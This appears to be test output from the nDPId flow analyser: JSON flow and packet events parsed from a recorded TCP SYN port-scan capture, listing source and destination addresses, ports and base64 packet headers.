-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs4i0AAC4GOEWsEAAIQA2GNIzTDSvdU4MZAAAAAGACDAAfYQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYYAADoGgOysEAAIQA2GNIzT1w\/dU4MZAAAAAGACDABVfAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs45YAADgGLNysEAAIQA2GNIzTBE7dU4MZAAAAAGACBAAwPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAsjPEAADMGiIGsEAAIQA2GNIzSFa7dUoMYAAAAAGACEAAS4QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAstTEAADcGXEGsEAAIQA2GNIzSCk7dUoMYAAAAAGACEAAeQQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAskyUAADIGg02sEAAIQA2GNIzSAgPdUoMYAAAAAGACDAAqjAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zgAADYGFzqsEAAIQA2GNIzSAivdUoMYAAAAAGACDAAqZAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs0mIAADUGQRCsEAAIQA2GNIzSA3DdUoMYAAAAAGACCAAtHwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsh+cAACgGmIusEAAIQA2GNIzSBtvdUoMYAAAAAGACBAAttAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADkGkCasEAAIQA2GNIzSwAfdUoMYAAAAAGACCABwhwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsmKkAACcGiMmsEAAIQA2GNIzSID7dUoMYAAAAAGACEAAIUQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsn+QAACsGfY6sEAAIQA2GNIzSBELdUoMYAAAAAGACEAAkTQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAs98kAADAGIKmsEAAIQA2GNIzSDPzdUoMYAAAAAGACBAAnkwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsrp0AADMGZtWsEAAIQA2GNIzSB9DdUoMYAAAAAGACEAAgvwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAspjMAADMGbz+sEAAIQA2GNIzSw1PdUoMYAAAAAGACEABlOwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsGwkAADUG+GmsEAAIQA2GNIzSJT\/dUoMYAAAAAGACCAALUAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDkAADYG9jmsEAAIQA2GNIzSAKHdUoMYAAAAAGACDAAr7gAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+cAADIGfousEAAIQA2GNIzSIyjdUoMYAAAAAGACDAAJZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAscOwAADQGo4asEAAIQA2GNIzSCDndUoMYAAAAAGACBAAsVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAst4UAADMGXe2sEAAIQA2GNIzSBL3dUoMYAAAAAGACEAAj0gAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsFa0AACoGCMasEAAIQA2GNIzSSizdUoMYAAAAAGACDADiYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsN6IAADgG2NCsEAAIQA2GNIzSApzdUoMYAAAAAGACBAAx8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAssMQAACwGa66sEAAIQA2GNIzSACHdUoMYAAAAAGACBAA0bgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsLEAAADgG5DKsEAAIQA2GNIzSFuPdUoMYAAAAAGACBAAdrAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+oAACgGiIisEAAIQA2GNIzSgAndUoMYAAAAAGACBAC0hQAAAgQFtA=="} 